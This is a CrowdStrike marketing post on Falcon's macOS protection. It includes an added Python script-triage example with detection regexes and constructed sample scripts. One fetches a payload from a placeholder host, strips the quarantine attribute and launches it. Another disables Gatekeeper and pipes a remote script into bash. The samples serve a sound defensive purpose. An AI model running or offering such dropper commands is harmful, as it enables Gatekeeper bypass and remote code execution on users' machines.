Falcon Extends Protection for macOS as Threats Surge

macOS is ubiquitous in enterprise environments, and adoption shows no signs of slowing. Recent IDC analysis shows macOS devices reached 23% utilization in enterprises (with 1,000+ employees) during 2020, a 6% increase over 2019. IDC attributes the Mac's recent surge in adoption to the COVID-19 pandemic, end-user preference and OS-flexible cloud business capabilities.

CrowdStrike Services has observed threat actors increasingly targeting macOS environments and gaining access in numerous ways, from adware and phishing to sophisticated malware-free and "living off the land" techniques. Compared to Windows systems in the same organization, macOS systems often lack equivalent monitoring and management, which lets threat actors remain active and undetected in macOS environments for months.

With rising utilization and unwanted attention from threat actors, macOS security through obscurity is no more. Using the CrowdStrike Falcon® platform, teams can awaken their inner Theodore Roosevelt and "speak softly and carry a big stick."

Extending Visibility and Security Management with macOS

CrowdStrike is an industry leader in endpoint protection across operating systems. With its single lightweight agent and cloud-native security platform, the Falcon platform delivers comprehensive Mac endpoint protection simply and effectively. Day One support for major OS updates eliminates gaps in coverage and the "here we go again" stress for teams supporting Mac environments. CrowdStrike's coverage goes beyond next-generation antivirus (NGAV) and endpoint detection and response (EDR), with macOS capabilities spanning threat intelligence, IT hygiene, device control and enhanced visibility through Zero Trust Assessment.

Knowing that many macOS users love to be on the cutting edge and quickly adopt new capabilities, CrowdStrike got to work early in 2020 and was one of the first vendors to offer Day One support for macOS Big Sur with a generally available version of the Falcon agent. Apple's changes went beyond the Big Sur release and extended to the hardware, with a shift from Intel x86 to Apple-designed M1 processors. The Falcon platform provided initial M1 support through Apple's Rosetta 2 translation layer, ensuring that customers running the new M1 chips were protected. (Native M1 support will be generally available later this month.)

As with most operating systems, there is good reason to stay current with version updates, especially those that include security patches and enhancements. In late April 2021, a new variant of the Shlayer malware made the news. This variant exploited a macOS vulnerability to bypass Gatekeeper and the other native checks that prevent unapproved software from running.

Though Apple has since patched this vulnerability, the episode demonstrates the ongoing need for continuous visibility and protection. Falcon detects Shlayer malware variants and extends protection further with Mac script control, which provides visibility into the contents of macOS scripts and enables script-based threat detection and prevention. Additional prevention technologies for macOS combine for broad, effective protection: on-sensor machine learning for malware and adware protection, indicator of attack (IOA) behavioral blocking, custom IOA blocking, and detections based on threat intelligence reputation.
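To make the idea of script-based detection concrete, here is an added example that is not CrowdStrike's code and does not reproduce Falcon's script-control logic: the rule set, the weights, the threshold and the three sample scripts are all constructed for illustration. It scores a macOS shell script on behaviours typical of droppers (quarantine stripping, decoding an embedded payload, piping a download into a shell, disabling Gatekeeper) and flags it once the weighted score crosses a threshold, so that a single common admin action such as editing a crontab does not trip an alert on its own.

```python
"""Heuristic triage of macOS shell scripts for dropper-like behaviour.

Added example, not CrowdStrike code: the rules and sample scripts below are
constructed for illustration and are not Falcon's script-control logic.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    weight: int
    pattern: re.Pattern


# Illustrative heuristics (assumed, not a vendor rule set). Each matches one
# behaviour commonly seen in script-based macOS droppers.
RULES = (
    # Remote content piped straight into a shell interpreter.
    Rule("download_to_exec", 3, re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:ba|z)?sh\b")),
    # Decoding an embedded or downloaded payload (macOS base64 uses -D, GNU -d).
    Rule("encoded_payload", 2, re.compile(r"\b(?:base64\s+(?:-D|-d|--decode)|openssl\s+enc\s+-d)\b")),
    # Touching the quarantine attribute so Gatekeeper never assesses the file.
    Rule("quarantine_strip", 4, re.compile(r"\bxattr\b[^\n]*(?:com\.apple\.quarantine|\s-c\w*\b)")),
    # Marking a file under a temp directory executable.
    Rule("exec_from_tmp", 2, re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\s+/(?:private/)?(?:tmp|var/tmp)/")),
    # Turning Gatekeeper off system-wide.
    Rule("gatekeeper_disable", 4, re.compile(r"\bspctl\s+--master-disable\b")),
    # Persistence locations; low weight because admins touch these legitimately.
    Rule("persistence", 1, re.compile(r"LaunchAgents|LaunchDaemons|\bcrontab\b")),
)

SUSPICIOUS_THRESHOLD = 5


def analyze_script(text: str) -> dict:
    """Return the rule names matched (in rule order) and their summed weight."""
    matches = [r.name for r in RULES if r.pattern.search(text)]
    score = sum(r.weight for r in RULES if r.name in matches)
    return {"matches": matches, "score": score}


def is_suspicious(text: str, threshold: int = SUSPICIOUS_THRESHOLD) -> bool:
    """A script is flagged when its weighted score reaches the threshold."""
    return analyze_script(text)["score"] >= threshold


# Constructed samples (not real malware). The URL is a placeholder.
DROPPER_LIKE = '''#!/bin/sh
TMP=$(mktemp -d /tmp/XXXXXX)
curl -s -L "https://example.invalid/payload" -o "$TMP/p.b64"
base64 -D -i "$TMP/p.b64" -o "$TMP/app.zip"
unzip -q "$TMP/app.zip" -d "$TMP"
xattr -rd com.apple.quarantine "$TMP/App.app"
chmod +x "$TMP/App.app/Contents/MacOS/App"
open "$TMP/App.app"
'''

INSTALLER_ONELINER = '''#!/bin/bash
sudo spctl --master-disable
curl -fsSL https://example.invalid/install.sh | bash
'''

ADMIN_SCRIPT = '''#!/bin/bash
# Nightly housekeeping (constructed benign example).
find /var/log/myapp -name '*.log' -mtime +7 -delete
crontab -l > /var/backups/crontab.txt
softwareupdate -l
'''

if __name__ == "__main__":
    for label, script in (("dropper", DROPPER_LIKE),
                          ("installer", INSTALLER_ONELINER),
                          ("admin", ADMIN_SCRIPT)):
        print(f"{label}: {analyze_script(script)} suspicious={is_suspicious(script)}")
```

The weighting matters more than the individual regexes: stripping `com.apple.quarantine` or running `spctl --master-disable` is rarely legitimate in a downloaded script and carries most of the score, while a `crontab` reference alone stays below the threshold. A real sensor works on the script content as it executes rather than on static text, but the same trade-off between precision and coverage applies.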

CrowdStrike Falcon Insight™ EDR provides unparalleled visibility and accelerates threat detection and response. Continuous monitoring across all operating systems offers full details and raw events including network telemetry to enable proactive and managed threat hunting and forensic investigations. Analysts can easily search through all collected events at scale, with no UI limitations that would delay investigation.

Wielding this trove of information, analysts can respond and remediate with confidence. Falcon Real Time Response (RTR) embodies “speak softly and carry a big stick” — incident responders remotely connect directly to the target host, gather additional relevant files and details, establish network containment, then upload and launch files and/or remediation scripts to deliver full remediation at scale.

External devices such as USB mass storage are a common and easily exploited attack vector, both for introducing malware and for removing data. Controlling which external devices may connect adds an effective barrier as one layer in a defense-in-depth approach to risk reduction. Device Control for macOS gives analysts intuitive, granular control of external USB devices in Big Sur environments without additional endpoint software or hardware to manage, and deploys quickly out of the box. Beta is scheduled to begin in June 2021.

The Falcon platform further extends macOS capabilities with Falcon X™ threat intelligence, Falcon Discover™ IT hygiene and Falcon Zero Trust Assessment™.

  • OS-spanning threat intelligence with Falcon X: Specialized intelligence for Mac is a force multiplier for analysts beyond what happened on the endpoint, revealing the “who, why and how” behind the attack. High-fidelity understanding and correlation of threats faced improves the efficacy of security investments with actionable and customized intelligence to defend against future attacks — for a proactive security reality.
  • IT hygiene with Falcon Discover: macOS coverage has recently been enhanced with extended application inventory and host monitoring, giving analysts enriched visibility into usage, application installs and account access activity. Analysts can also monitor CPU and RAM capacity for macOS within the System Capacity dashboard and spot encryption gaps within the Drive Encryption dashboard. With this extended coverage, analysts can see which accounts, applications or systems are potentially at risk and pivot quickly to more in-depth analysis.
  • Endpoint health scoring with Falcon Zero Trust Assessment: the overall health of a Mac endpoint is summarized in a single metric. Administrators can drill down to view Falcon prevention policy settings on specific Mac endpoints, along with recommendations to improve security posture. These metrics can be shared with CrowdStrike partners for real-time conditional access enforcement.

Continuing the Fight 

The enterprise Mac footprint is growing, and so is the number of macOS threats organizations face. Together these trends highlight the need for complete visibility and comprehensive security management if teams are to stay ahead of threat actors and keep their organizations secure. CrowdStrike will continue to lead with industry-leading visibility and comprehensive endpoint protection for all types of workloads anywhere.
